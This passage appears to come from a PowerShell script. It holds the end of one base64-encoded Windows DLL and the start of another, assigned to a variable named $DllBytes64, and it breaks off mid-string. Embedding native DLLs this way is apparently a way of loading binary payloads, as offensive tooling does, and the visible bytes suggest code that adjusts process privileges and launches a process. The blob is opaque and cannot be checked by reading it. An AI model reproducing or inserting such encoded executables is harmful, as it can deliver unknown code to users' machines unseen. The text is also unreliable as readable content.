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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
     $DllBytes64 = "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